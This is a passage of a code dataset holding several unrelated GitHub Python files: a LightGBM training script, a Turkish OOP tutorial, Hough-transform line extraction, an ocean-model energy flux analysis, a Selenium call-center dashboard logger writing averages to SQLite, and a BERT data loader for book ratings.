d.split())))\n\n\nwith open('pkl/topic.pkl', 'rb') as file:\n topicmap = pickle.load(file)\ntopicmap.shape\ntopic_vector_dict = dict(zip(np.array(topicmap['id']), np.array(topicmap['embed'])))\n\ntype(topic_vector_dict.keys())\n\n\n# 求话题向量平均值\ndef topic2v(x):\n try:\n tmp = topic_vector_dict[x[0]]\n except:\n tmp = np.zeros(64)\n for i in x[1:]:\n tmp = tmp + topic_vector_dict[i]\n if len(tmp) == 0:\n return np.zeros(64)\n return 
(tmp / len(x))\n\n\ntqdm.pandas(desc=\"topic2v...\")\nans_topic_vector['topic_vector'] = ans_topic_vector['topic'].progress_apply(lambda x: topic2v(x))\nprint('finished!')\nans_topic_vector.head()\nwith open('pkl/user_feat.pkl', 'rb') as file:\n user = pickle.load(file)\nuser.shape\ncolumns = ['uid']\n\ncolumns.append('inter_topic_vector')\nuser_topic = user[columns]\nuser_topic.head()\nanswer_q_topic_vector = pd.merge(user_topic, ans_topic_vector, on='uid')\nanswer_q_topic_vector.head()\nfor i in range(64):\n col_name = 'answer_q_topic_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"topic_interest2v...\")\n ans_topic_vector[col_name] = ans_topic_vector['topic_vector'].apply(lambda x: listi(x, i))\n# %%\n# 模型训练\nimport pandas as pd\nimport numpy as np\nimport os\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import StratifiedKFold\nfrom lightgbm import LGBMClassifier\nimport logging\nimport pickle\n\nwith open('pkl/data_vecor.pkl', 'rb') as file:\n data_a = pickle.load(file)\ndata_a.head()\nfeature_cols = [x for x in data_a.columns if x not in ('label', 'uid', 'qid', 'dt', 'day')]\n# target编码\n# train_label = train[(train['day'] > train_label_feature_end)]\n# print(len(train_label))\ntrain_label = 2593669\nX_train_all = data_a.iloc[:train_label][feature_cols]\ny_train_all = data_a.iloc[:train_label]['label']\ntest = data_a.iloc[train_label:]\n\nlogging.info(\"train shape %s, test shape %s\", X_train_all.shape, test.shape)\nprint(X_train_all.shape)\nprint(test.shape)\nmodel_lgb = LGBMClassifier(boosting_type='gbdt', num_leaves=64, learning_rate=0.01, n_estimators=2000,\n max_bin=425, subsample_for_bin=50000, objective='binary', min_split_gain=0,\n min_child_weight=5, min_child_samples=10, subsample=0.8, subsample_freq=1,\n colsample_bytree=1, reg_alpha=3, reg_lambda=5, seed=1000, n_jobs=-1, silent=True)\nfold = StratifiedKFold(n_splits=5, shuffle=True, random_state=42)\nfor index, (train_idx, val_idx) in enumerate(fold.split(X=X_train_all, y=y_train_all)):\n X_train, X_val, y_train, y_val = X_train_all.iloc[train_idx][feature_cols], X_train_all.iloc[val_idx][feature_cols], \\\n y_train_all.iloc[train_idx], \\\n y_train_all.iloc[val_idx]\n model_lgb.fit(X_train, y_train,\n eval_metric=['logloss', 'auc'],\n eval_set=[(X_val, y_val)],\n early_stopping_rounds=10)\nsub = pd.read_csv(f'data/invite_info_evaluate_1_0926.txt', sep='\\t', header=None)\nsub.columns = ['qid', 'uid', 'dt']\nsub['label'] = model_lgb.predict_proba(test[feature_cols])[:, 1]\nsub.to_csv('result.txt', index=None, header=None, sep='\\t')\n# %%\n","repo_name":"hqqiao/DataMiningCode","sub_path":"project-expert/expert-last.py","file_name":"expert-last.py","file_ext":"py","file_size_in_byte":14907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"72828156715","text":"# Object Oriented Programming -> Nesne tabanlı programlama\n\nclass Urun:\n def toplam_fiyat_hesapla(self,x,y):\n return x*y #fiyat * adet dönecek.\n\n\nurun = Urun()\n\nurun.ad = \"Telefon\"\nurun.fiyat = 5000\nurun.adet = 4\n\nprint(type(urun))\nprint(type(urun.ad))\nprint(type(urun.fiyat))\nprint(type(urun.adet))\n\n\ntoplam_fiyat = urun.toplam_fiyat_hesapla(urun.fiyat, urun.adet)\n\nprint(toplam_fiyat)\n\nurun2 = Urun()\nurun2.ad = \"Bilgisayar\"\nurun2.fiyat = 30000\nurun2.adet = 2\n\nprint(urun2.toplam_fiyat_hesapla(urun2.fiyat, urun2.adet))\n\n\nclass Dog:\n\n sehir = \"Adana\"\n\n #Constructor\n def __init__(self, ad, yas):\n self.ad = ad\n self.yas = yas\n\n def 
havla(self):\n        print(f\"{self.ad} havlıyor.\")\n\n\nmy_dog = Dog(\"Karabaş\", 3)\ndog2 = Dog(\"Garip\", 5)\nmy_dog.havla()\n\nprint(my_dog.ad)\n\nprint(f\"{my_dog.ad} {my_dog.yas} yaşında.\")\n\nprint(Dog.__dict__)\nprint(my_dog.__dict__)\n\nprint(dog2.__dict__)\n\nprint(my_dog.sehir)","repo_name":"gul-cincik/Backend","sub_path":"ders6/oop.py","file_name":"oop.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"6481328356","text":"from __future__ import division\nimport cv2\nimport numpy as np\n\nclass Hough:\n\n\tdef __init__(self, imageName, points=None):\n\t\tself.points = points\n\t\tself.imageName = imageName\n\t\tself.image = None\n\n\tdef TransformImage(self):\n\t\tself.image = cv2.imread(self.imageName)\n\t\tgray = cv2.cvtColor(self.image,cv2.COLOR_BGR2GRAY)\n\t\tedges = cv2.Canny(gray,50,150,apertureSize = 3)\n\t\tcv2.imwrite('bremen-edges.png', edges)\n\t\treturn edges\n\n\tdef GetLineSegments(self, edges):\n\t\tsegments = []\n\t\tlines = cv2.HoughLinesP(edges, 1, np.pi/360, 70)\n\n\t\tfor x1, y1, x2, y2 in lines[0]:\n\t\t\t# print('line', line)\n\t\t\t# rho = line[0][0]\n\t\t\t# theta = line[0][1]\n\t\t\t# a = np.cos(theta)\n\t\t\t# b = np.sin(theta)\n\t\t\t# x0 = a*rho\n\t\t\t# y0 = b*rho\n\t\t\t# x1 = int(x0 + 1000*(-b))\n\t\t\t# y1 = int(y0 + 1000*(a))\n\t\t\t# x2 = int(x0 - 1000*(-b))\n\t\t\t# y2 = int(y0 - 1000*(a))\n\t\t\tsegments.append([(x1, y1), (x2, y2)])\n\n\t\t# FormatForPolygonConversion is never defined in this file; return the\n\t\t# raw segment list, which is what main() prints.\n\t\treturn segments\n\n\tdef DrawSegments(self, segments):\n\t\tsegments_only_image = np.zeros(self.image.shape)\n\n\t\tfor line in segments:\n\t\t\tcv2.line(segments_only_image,line[0],line[1],(0,200,0),1)\n\t\t\n\t\tcv2.imwrite('houghlines-bremen.jpg', segments_only_image)\n\n\n################################################################################\n\ndef main():\n\th = Hough(imageName='bremen_altstadt_final.png')\n\t# h = Hough(imageName='sudoku-original.jpg')\n\tedges = h.TransformImage()\n\n\th.image[h.image < 108] = 0\n\th.image[h.image >= 108] = 255\n\n\tsegments = h.GetLineSegments(cv2.cvtColor(h.image.astype(np.uint8), cv2.COLOR_BGR2GRAY))\n\t# h.DrawSegments(segments)\n\n\tprint('segments', segments)\n\nif __name__ == '__main__':\n    main()\n\n################################################################################\n\ndef image_to_segments(image):\n\tRESOLUTION = 1\n\tNUMBER_OF_ANGLES = 180\n\tVOTES_REQUIRED_TO_COUNT_AS_A_LINE = 70\n\n\timage[image < 100] = 0\n\timage[image >= 100] = 255\n\timage = cv2.cvtColor(image.astype(np.uint8), cv2.COLOR_BGR2GRAY)\n\n\tsegments = []\n\tlines = cv2.HoughLinesP(\n\t\timage, \n\t\tRESOLUTION,\n\t\tnp.pi/NUMBER_OF_ANGLES, \n\t\tVOTES_REQUIRED_TO_COUNT_AS_A_LINE\n\t)\n\n\treturn np.array([[x1, y1, x2, y2] for x1, y1, x2, y2 in lines[0]])\n","repo_name":"BYU-PCCL/Serenity","sub_path":"points_to_segments/hough.py","file_name":"hough.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"18487191371","text":"import functools\ndef addTwoDigits(n):\n    \"\"\"\n
    Return the sum of the decimal digits of the integer n.\n\n    The file-reading, zip and map statements below are unrelated scratch\n    experiments that this practice script also runs and prints.\n    \"\"\"\n    list2=[]\n    with open(\"text.txt\",'r+') as f:\n        list1=f.readlines()\n    mydict={}\n    for item in list1:\n        #item.strip()\n        list2.append(item.strip().split(\",\"))\n\n    print(list2)\n    list3=[]\n    for i in range(1,len(list2)):\n        list3.append(dict(zip(list2[i],list2[0])))\n    print(list3)\n    list1 = [int(ch) for ch in str(n)]\n    sum2=functools.reduce(lambda x,y:x+y ,list1)\n    list1 =[int(ch) for ch in str(n)]\n    x=list(map(lambda x:x**2,[2,3,4,5,6,7,8]))\n    print(x)\n    print(sum2)\n    sum1 =0\n    for item in list1:\n        sum1=sum1+item\n    print(sum1)\n    return sum1\nif __name__==\"__main__\":\n    print(addTwoDigits(29))\n","repo_name":"mthimmareddy/PythonPractice","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"3346703754","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport netCDF4\nimport octant\nimport octant.roms\n\nncfile = 'simulations/shelfstrat_M2_1.00e-06_N2_1.00e-04_f_1.00e-04/shelfstrat_his.nc'\n\nnc = netCDF4.Dataset(ncfile)\ntime = nc.variables['ocean_time'][:]/86400.0\n\ndelta = 0.1\n\nHMF = np.zeros((len(time), 129), 'd')\nVMF = np.zeros((len(time), 129), 'd')\nHBF = np.zeros((len(time), 129), 'd')\nVBF = np.zeros((len(time), 130), 'd')\n\nfor tidx in range(len(time)):\n    zw = octant.roms.nc_depths(nc, 'w')[tidx]\n    dz = np.diff(zw, axis=0)\n    pm = nc.variables['pm'][:]\n    pn = nc.variables['pn'][:]\n    dV = dz/(pm*pn)\n\n    rho0 = nc.variables['rho0'][:]\n    rho = nc.variables['rho'][tidx]\n    b = 9.8*(rho0-(1000.0+rho))/rho0\n    bm = b.mean(axis=-1)[:, :, np.newaxis]\n    bp = b - bm\n\n    u = nc.variables['u'][tidx]\n    um = u.mean(axis=-1)[:, :, np.newaxis]\n    up = u - um\n\n    vm = 0.0\n    vp = nc.variables['v'][tidx]\n    \n    wp = nc.variables['w'][tidx, 1:-1]\n    \n    up, vp = octant.tools.shrink(up, vp)\n    Uy = np.diff(um, axis=-2)/1000.0\n    dVu = octant.tools.shrink(dV, up.shape)\n    \n    # U_y\n    HMF[tidx, :] = np.sum( np.sum(dVu*up*vp, axis=-1) * Uy[:, :, 0], axis=0) \n\n    zr = octant.roms.nc_depths(nc, 'rho')[tidx]\n    Uz = np.diff(um, axis=0)/np.diff(zr, axis=0)\n    \n    wp_b, bp_b = octant.tools.shrink(wp, bp)\n    dV_b = octant.tools.shrink(dV, wp_b.shape)\n    \n    # \n    VBF[tidx, :] = np.sum( np.sum(dV_b*bp_b*wp_b, axis=-1) , axis=0) \n    \n    up_w, wp_w = octant.tools.shrink(up, wp)\n    Uz_w = octant.tools.shrink(Uz, up_w.shape)\n    dV_w = octant.tools.shrink(dV, up_w.shape)\n\n    # U_z\n    VMF[tidx, :] = np.sum( np.sum(dV_w*up_w*wp_w, axis=-1) * Uz_w[:, :, 0], axis=0) \n\n    bp = octant.tools.shrink(bp, vp.shape)\n    \n    # (B_x / B_z)\n    HBF[tidx, :] = np.sum( np.sum(dVu*bp*vp, axis=-1) * (1e-3/delta), axis=0) \n\n#\nnp.save('HMF', HMF.sum(axis=-1)/dV.sum())\nnp.save('VMF', VMF.sum(axis=-1)/dV_w.sum())\n\nnp.save('HBF', HBF.sum(axis=-1)/dVu.sum())\nnp.save('VBF', VBF.sum(axis=-1)/dV.sum())\n\n#\nfig = plt.figure(figsize=(8, 5))\nax = fig.add_subplot(111)\n\nax.plot(time, VBF.sum(axis=-1)/dV.sum(), '-r', lw=2)\nax.plot(time, HMF.sum(axis=-1)/dV.sum(), '-g', lw=2)\nax.plot(time, VMF.sum(axis=-1)/dV_w.sum(), '-b', 
lw=2)\nax.grid(True)\nax.set_xlabel('time [days]')\nax.text(9, 2e-8, r\"$$\", color='r')\n\n# ax.set_ylabel('Mean energy flux [m$^2$ s$^{-3}$]')\n# ax.text(15.5, 10.5, 'Horizontal eddy buoyancy flux', color='r')\n# ax.text(15.5, 0.5, 'Horizontal Reynolds stress', color='k')\n#\n# plt.savefig('energy_conversion.pdf')\n","repo_name":"hetland/shelfstrat","sub_path":"energy_conversion.py","file_name":"energy_conversion.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"15010438913","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport re\nimport sqlite3\nfrom datetime import datetime\nimport time\na = 0\n\n\n\n#--------sqlite connection---------\ncon = sqlite3.connect('b2c_wall(5).sqlite3')\ncon.cursor()\ncur= con.cursor()\ncur.execute('CREATE TABLE IF NOT EXISTS avg_minute(all_agents text ,Input_agent text,Talking text,Idle text,Pause text,Output_agent text,All_calls text,Waitings text,Holdtime text,time text)')\ncur.execute('CREATE TABLE IF NOT EXISTS avg_quarter(all_agents text ,Input_agent text,Talking text,Idle text,Pause text,Output_agent text,All_calls text,Waitings text,Holdtime text,Start text,End text)')\ncur.execute('CREATE TABLE IF NOT EXISTS avg_hour(all_agents text ,Input_agent text,Talking text,Idle text,Pause text,Output_agent text,All_calls text,Waitings text,Holdtime text,Start text,End text)')\n\n#---------selenium driver----------\nPATH = \"C:\\Program Files (x86)\\chromedriver.exe\"\ndriver = webdriver.Chrome(PATH)\ndriver.get(\"https://q1-panel.asiatech.ir/admin/SystemStatus/wall/\")\nusername = driver.find_element_by_id(\"UserUsername\")\nusername.send_keys(\"********\")#Enter username\npassword = driver.find_element_by_id(\"UserP\")\npassword.send_keys(\"@********\")#Enter Password\npassword.send_keys(Keys.ENTER)\n\n\n#----------Processing data----------\ntalking_minute = [] \nidle_minute = []\ninputing_agents_minute = []\noutput_agents_minutes = []\nall_agents_minutes = []\nwating_minutes =[]\nall_calls_minutes = []\nholdtime_sec = []\nholdtime_min = []\npause_minute = []\n\n#----------------------\ntalkin_quarter =[]\nidle_quarter = []\ninputing_agents_quarter =[]\noutput_agents_quarter = []\nall_agents_quarter =[]\nwating_quarter = []\nall_calls_quarter = []\nholdtime_min_quarter = []\nholdtime_sec_quarter = []\npause_quarter = []\n\n\n\n\nwhile True:\n a +=1\n print(a)\n wall = driver.find_elements_by_class_name(\"tablesorter\")\n\n\n search_list =[]\n idle = []\n talking = []\n pausee = []\n outputing_agents = [] \n inputing_agents = []\n all_agents = []\n waiting = []\n holdtime = []\n pause = []\n b2c =[]\n b2c_q = []\n b2c_h = []\n timing_withiut_second = 0\n\n\n\n #-----------------Data extraction with regax\n for i in wall:\n search_list.append(i.text)\n for i in search_list:\n resualt = re.findall(r'Idle .(\\d+)',i)\n if resualt:\n idle.append(int(resualt[0]))\n for i in search_list:\n resualt = re.findall(r'Talking .(\\d+)',i)\n if resualt:\n talking.append(int(resualt[0]))\n for i in search_list:\n resualt =re.findall(r'\\d+:\\d+:\\d+ (\\d+)',i)\n if resualt:\n inputing_agents.append(int(resualt[0]))\n outputing_agents.append(int(resualt[1]))\n all_agents.append(int(resualt[2]))\n for i in search_list:\n resualt = re.findall(r'B2C (\\d+) \\d+:\\d+:\\d+',i)\n if resualt:\n waiting.append(int(resualt[0]))\n for i in search_list:\n resualt = re.findall(r'B2C \\d+ (\\d+:\\d+:\\d+)',i)\n if resualt:\n 
holdtime.append(resualt[0])\n for i in search_list:\n resualt = re.findall(r'B2C \\d+ \\d+:\\d+:\\d+ \\d+ (\\d+)',i)\n if resualt:\n pause.append(int(resualt[0]))\n print('waitings:',waiting[0])\n print('talking:',talking[0])\n all_calls = waiting[0]+talking[0]\n\n\n #------------- Calculate time --------\n timing = datetime.now().time()\n timing_withiut_second = timing.strftime(\"%H:%M\")\n if len(idle_minute) == 0 :\n start_q = timing_withiut_second\n if len(idle_minute)==0 and len(idle_quarter) == 0:\n start_h = timing_withiut_second\n\n\n #---------Insert the extracted data list for insert to db-------------\n b2c.append(all_agents[0])\n b2c.append(inputing_agents[0])\n b2c.append(talking[0])\n b2c.append(idle[0])\n b2c.append(pause[0])\n b2c.append(outputing_agents[0])\n b2c.append(all_calls)\n b2c.append(waiting[0])\n b2c.append(holdtime[0])\n b2c.append(timing_withiut_second)\n \n\n #-----------To calculate the average--------------\n idle_minute.append(idle[0])\n talking_minute.append(talking[0])\n inputing_agents_minute.append(inputing_agents[0])\n output_agents_minutes.append(outputing_agents[0])\n all_agents_minutes.append(all_agents[0])\n wating_minutes.append(waiting[0])\n all_calls_minutes.append(all_calls) \n pause_minute.append(pause[0])\n #---------------Dedicate seconds from holdtime to calculate the average------------\n hold= re.findall(r'\\d+:\\d+:(\\d+)',holdtime[0])\n holdtime_sec.append(int(hold[0]))\n\n hold = re.findall(r'\\d+:(\\d+):\\d+',holdtime[0])\n holdtime_min.append(int(hold[0])) \n\n\n print(b2c)\n cur.execute('insert into avg_minute(all_agents,Input_agent,Talking,Idle,Pause,Output_agent,All_calls,Waitings,Holdtime,time) values (?,?,?,?,?,?,?,?,?,?)',b2c)\n con.commit()\n\n\n #-----------------calculate the average of quarter (15min) and insert to db-----------\n if len(idle_minute) == 15 and len(talking_minute)==15:\n avg_idle_quarter =round(sum(idle_minute)/len(idle_minute))\n avg_talking_quarter = round(sum(talking_minute)/len(talking_minute))\n avg_inputing_agents_quarter = round(sum(inputing_agents_minute)/len(inputing_agents_minute))\n avg_output_agents_quarter = round(sum(output_agents_minutes)/len(output_agents_minutes))\n avg_all_agents_quarter = round(sum(all_agents_minutes)/len(all_agents_minutes))\n avg_waiting_quarter = round(sum(wating_minutes)/len(wating_minutes))\n avg_all_calls_quarter = round(sum(all_calls_minutes)/len(all_calls_minutes))\n avg_pause_quarter = round(sum(pause_minute)/len(pause_minute))\n avg_holdtime_sec = round(sum(holdtime_sec)/len(holdtime_sec))\n avg_holdtime_min = round(sum(holdtime_min)/len(holdtime_min))\n\n\n\n idle_quarter.append(avg_idle_quarter)\n talkin_quarter.append(avg_talking_quarter)\n inputing_agents_quarter.append(avg_inputing_agents_quarter)\n output_agents_quarter.append(avg_output_agents_quarter)\n all_agents_quarter.append(avg_all_agents_quarter)\n wating_quarter.append(avg_waiting_quarter)\n all_calls_quarter.append(avg_all_calls_quarter)\n holdtime_min_quarter.append(avg_holdtime_min)\n holdtime_sec_quarter.append(avg_holdtime_sec)\n pause_quarter.append(avg_pause_quarter)\n\n\n\n idle_minute.clear()\n talking_minute.clear()\n inputing_agents_minute.clear()\n output_agents_minutes.clear()\n all_agents_minutes.clear()\n wating_minutes.clear()\n all_calls_minutes.clear()\n holdtime_sec.clear()\n holdtime_min.clear()\n pause_minute.clear()\n\n \n\n b2c_q.append(avg_all_agents_quarter)\n b2c_q.append(avg_inputing_agents_quarter)\n b2c_q.append(avg_talking_quarter)\n b2c_q.append(avg_idle_quarter)\n 
b2c_q.append(avg_pause_quarter)\n b2c_q.append(avg_output_agents_quarter)\n b2c_q.append(avg_all_calls_quarter)\n b2c_q.append(avg_waiting_quarter)\n minute = (f\"{str(avg_holdtime_min)}:{str(avg_holdtime_sec)}\")\n b2c_q.append(minute) \n b2c_q.append(start_q)\n b2c_q.append(timing_withiut_second)\n\n \n \n\n\n cur.execute('insert into avg_quarter(all_agents,Input_agent,Talking,Idle,Pause,Output_agent,All_calls,Waitings,Holdtime,Start,End) values (?,?,?,?,?,?,?,?,?,?,?)',b2c_q)\n con.commit()\n\n\n #------------- calculate the average of one hour and insert to db\n if len(talkin_quarter) == 4 and len(idle_quarter) == 4:\n avg_idle_hour =round( sum(idle_quarter)/len(idle_quarter))\n avg_talking_hour = round(sum(talkin_quarter)/len(talkin_quarter))\n avg_inputing_agents_hour = round(sum(inputing_agents_quarter)/len(inputing_agents_quarter))\n avg_output_agents_hour =round(sum(output_agents_quarter)/len(output_agents_quarter))\n avg_all_agents_hour = round(sum(all_agents_quarter)/len(all_agents_quarter))\n avg_waiting_hour = round(sum(wating_quarter)/len(wating_quarter))\n avg_all_calls_hour = round(sum(all_calls_quarter)/len(all_calls_quarter))\n avg_pause_hour = round(sum(pause_quarter)/len(pause_quarter))\n holdtime_sec_for_avg_hour = round(sum(holdtime_sec_quarter)/len(holdtime_sec_quarter))\n holdtime_min_for_avg_hour = round(sum(holdtime_min_quarter)/len(holdtime_min_quarter))\n avg_pause_hour = round(sum(pause_quarter)/len(pause_quarter))\n\n\n\n\n b2c_h.append(avg_all_agents_hour)\n b2c_h.append(avg_inputing_agents_hour)\n b2c_h.append(avg_talking_hour)\n b2c_h.append(avg_idle_hour)\n b2c_h.append(avg_pause_hour)\n b2c_h.append(avg_output_agents_hour)\n b2c_h.append(avg_all_calls_hour)\n b2c_h.append(avg_waiting_hour)\n hour = (f\"{str(holdtime_min_for_avg_hour)}:{str(holdtime_sec_for_avg_hour)}\")\n b2c_h.append(hour)\n b2c_h.append(start_h)\n b2c_h.append(timing_withiut_second)\n\n \n \n\n\n idle_quarter.clear()\n talkin_quarter.clear()\n inputing_agents_quarter.clear()\n output_agents_quarter.clear()\n all_agents_quarter.clear()\n wating_quarter.clear()\n all_calls_quarter.clear()\n holdtime_sec_quarter.clear()\n holdtime_min_quarter.clear()\n pause_quarter.clear()\n \n\n\n cur.execute('insert into avg_hour (all_agents,Input_agent,Talking,Idle,Pause,Output_agent,All_calls,Waitings,Holdtime,Start,End) values (?,?,?,?,?,?,?,?,?,?,?)',b2c_h)\n con.commit()\n print(timing_withiut_second)\n time.sleep(59)\n driver.refresh()","repo_name":"hoseynchegeni/CallCenter_LogManagement","sub_path":"wall.py","file_name":"wall.py","file_ext":"py","file_size_in_byte":9534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"31773356839","text":"import os, sys, re, pickle\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn\nimport pandas as pd\nimport tensorflow as tf\nimport math\nfrom tensorflow import keras\nfrom transformers import BertTokenizer, BertConfig, TFBertModel\nfrom tqdm import tqdm\nprint(sys.version_info)\n\nfor module in tf, mpl, np, pd, sklearn, tf, keras:\n print(module.__name__, module.__version__)\n# 预训练模型来自于 https://github.com/huggingface/transformers\nORIGIN_DATA_DIR = os.getcwd() + '/all_fearures/BX-CSV-Dump/'\nFILTERED_DATA_DIR = os.getcwd() + '/tmp_bert/'\n#\nORIGIN_DATA_DIR = os.getcwd() + '/all_fearures/BX-CSV-Dump/'\nFILTERED_DATA_DIR = os.getcwd() + '/tmp_bert/'\n\n\nclass DataLoad:\n def __init__(self):\n '''\n books_with_blurbs.csv cloumns: 
ISBN,text,Author,Year,Publisher,Blurb\n BX-Book-Ratings.csv cloumns: User-ID,ISBN,Book-Rating\n BX-Books.csv cloumns: ISBN,Book-text,Book-Author,Year-Of-Publication,Publisher,Image-URL-S,Image-URL-M,Image-URL-L\n BX-Users.csv cloumns: User-ID,Location,Age\n '''\n self.BX_Users = self.load_origin('BX-Users')\n self.BX_Book_Ratings = self.load_origin('BX-Book-Ratings')\n self.books_with_blurbs = self.load_origin('books_with_blurbs', ',')\n # 合并三个表\n self.features = self.get_features()\n self.labels = self.features.pop('Book-Rating')\n\n def load_origin(self,\n filename: \"根据文件名获取源文件, 获取正确得columns、values等值\",\n sep: \"因为源文件的分隔方式sep不同, 所以通过传参改编分隔方式\" = \"\\\";\\\"\",\n ) -> pd.DataFrame:\n '''\n 获取原始数据,第一遍获取后将用pickle保存到本地,方便日后调用\n '''\n try:\n # 从缓存的文件夹FILTERED_DATA_DIR获取基本被过滤后的文件\n pickled_data = pickle.load(open(FILTERED_DATA_DIR + filename + '.p', mode='rb'))\n return pickled_data\n except FileNotFoundError:\n # 如果缓存的文件不存在或者没有,则在源目录ORIGIN_DATA_DIR获取\n all_fearures = pd.read_csv(ORIGIN_DATA_DIR + filename + '.csv', engine='python', sep=sep, encoding='utf-8')\n # \\\";\\\" 初始过滤的文件\n # , 初始不需要过滤的文件\n data_dict = {\"\\\";\\\"\": self.filtrator(all_fearures), ',': all_fearures}\n # 因为没获得处理后的文件,所以我们在获取源文件后可以保存一下处理后的文件\n pickle.dump((data_dict[sep]), open(FILTERED_DATA_DIR + filename + '.p', 'wb'))\n return data_dict[sep]\n except UnicodeDecodeError as e:\n ''' 测试时经常会出现编码错误,如果尝试更换编码方式无效,可以将编码错误的部分位置重新复制粘贴就可以了,这里我们都默认UTF-8'''\n print('UnicodeDecodeError:', e)\n except pd.errors.ParserError as e:\n print(\"connect error|pandas Error: %s\" % e)\n\n def filtrator(self,\n f_data: \"输入需要进行初步filter的数据\"\n ) -> pd.DataFrame:\n '''\n 源文件中的columns和各个值得第一列的第一个字符和最后一列的最后一个字符都带有双引号‘\"’,需要将其filter,Location字段当用户Age为null的时候,末尾会有\\\";NULL字符串 ,直接用切片调整\n '''\n Nonetype_age = 0\n f_data = f_data.rename(\n columns={f_data.columns[0]: f_data.columns[0][1:], f_data.columns[-1]: f_data.columns[-1][:-1]})\n f_data[f_data.columns[0]] = f_data[f_data.columns[0]].map(lambda v: v[1:] if v != None else Nonetype_age)\n f_data[f_data.columns[-1]] = f_data[f_data.columns[-1]].map(lambda v: v[:-1] if v != None else Nonetype_age)\n try:\n f_data = f_data[f_data['Location'].notnull()][\n f_data[f_data['Location'].notnull()]['Location'].str.contains('\\\";NULL')]\n f_data['Location'] = f_data['Location'].map(lambda location: location[:-6])\n except:\n pass\n return f_data\n\n def get_features(self):\n '''\n 获取整个数据集的所有features,并对每个文本字段作xxxxx\n User-ID\n Location\n ISBN\n Book-Rating\n Title\n Author\n Year\n Publisher\n Blurb\n '''\n try:\n # 从缓存的文件夹FILTERED_DATA_DIR获取features的文件\n pickled_data = pickle.load(open(FILTERED_DATA_DIR + 'features.p', mode='rb'))\n return pickled_data\n except FileNotFoundError:\n # 将所有的数据组成features大表\n all_fearures = pd.merge(pd.merge(self.BX_Users, self.BX_Book_Ratings), self.books_with_blurbs)\n # 因为没获得处理后的文件,所以我们在获取源文件后可以保存一下处理后的文件\n all_fearures.pop('Age')\n all_fearures['Title'] = self.feature2int(all_fearures['Title'], 'text', 15)\n all_fearures['Blurb'] = self.feature2int(all_fearures['Blurb'], 'text', 200)\n all_fearures['ISBN'] = self.feature2int(all_fearures['ISBN'], 'word')\n all_fearures['Author'] = self.feature2int(all_fearures['Author'], 'word')\n all_fearures['Publisher'] = self.feature2int(all_fearures['Publisher'], 'word')\n all_fearures['User-ID'] = self.feature2int(all_fearures['User-ID'], 'word')\n all_fearures['Year'] = self.feature2int(all_fearures['Year'], 'word')\n all_fearures['Location'] = self.feature2int(all_fearures['Location'], 'list')\n all_fearures['Book-Rating'] = 
all_fearures['Book-Rating'].astype('float32')\n pickle.dump(all_fearures, open(FILTERED_DATA_DIR + 'features.p', 'wb'))\n return all_fearures\n\n def feature2int(self,\n feature: 'the feature values',\n feature_type: 'text/word/list',\n length: 'maximum length allowed for the text' = 0,\n ):\n '''\n For text fields such as title and blurb, keep only the English words (space separated), build an indexed vocabulary from them, and represent each word by its index; that index sequence is the representation of the text\n '''\n pattern = re.compile(r'[^a-zA-Z]')\n filtered_map = {val: re.sub(pattern, ' ', str(val)) for ii, val in enumerate(set(feature))}\n\n word_map = {val: ii for ii, val in enumerate(set(feature))}\n\n try:\n cities = set()\n for val in feature.str.split(','):\n cities.update(val)\n city_index = {val: ii for ii, val in enumerate(cities)}\n list_map = {val: [city_index[row] for row in val.split(',')][:3] for ii, val in enumerate(set(feature))}\n except AttributeError:\n list_map = {}\n\n feature_dict = {\n 'text': feature.map(filtered_map),\n 'word': feature.map(word_map),\n 'list': feature.map(list_map),\n }\n return feature_dict[feature_type]\n\n def __del__(self):\n pass\n\n\norigin_DATA = DataLoad()\nmax_sequence_length = 512\nbert_path = './bert_models/'\n# maximum combined length of title+blurb\nblurb_series = origin_DATA.features.Blurb\ntitle_series = origin_DATA.features.Title\n\nclass pre_title_blurb():\n def __init__(self, lengths):\n self.max_sequence_length = lengths\n self.bert_path = './bert_models/'\n self.blurb_series = origin_DATA.features.Blurb\n self.title_series = origin_DATA.features.Title\n self.tokenizer = BertTokenizer.from_pretrained(self.bert_path+'bert-base-uncased-vocab.txt')\n self.input_ids, self.input_type_ids, self.input_masks = self.return_id()\n def return_id(self):\n input_ids, input_type_ids, input_masks = [], [], []\n for index in tqdm(range(math.ceil(blurb_series.shape[0]/10))):\n # encode_plus builds the text, position and segment tokens for us automatically\n inputs = self.tokenizer.encode_plus(text=title_series[index], text_pair=blurb_series[index], add_special_tokens=True,\n max_length=self.max_sequence_length, truncation_strategy='longest_first')\n # pad manually so that all three token vectors line up\n padding_id = self.tokenizer.pad_token_id\n input_id = inputs['input_ids']\n padding_length = self.max_sequence_length-len(input_id)\n input_id = inputs['input_ids'] + [padding_id] * (padding_length)\n input_type_id = inputs['token_type_ids']\n input_type_id = input_type_id + [0] * padding_length\n input_mask = inputs['attention_mask']\n input_mask = input_mask + [0] * padding_length\n input_ids.append(input_id)\n input_type_ids.append(input_type_id)\n input_masks.append(input_mask)\n return np.array(input_ids), np.array(input_type_ids), np.array(input_masks)\n\ndata_blurb_title = pre_title_blurb(lengths=max_sequence_length)\n\nprint(data_blurb_title.input_ids.shape)\nprint(data_blurb_title.input_masks.shape)\nprint(data_blurb_title.input_type_ids.shape)\n\n# user-id lookup; there are 28836 users in total\nall_user = len(set(origin_DATA.features['User-ID']))\nnew_user_id = {val: i for i, val in enumerate(set(origin_DATA.features['User-ID']))}\nprint('all user id = ', all_user)\n# number of locations = 7573 (0-based)\nall_location = max([j for i in 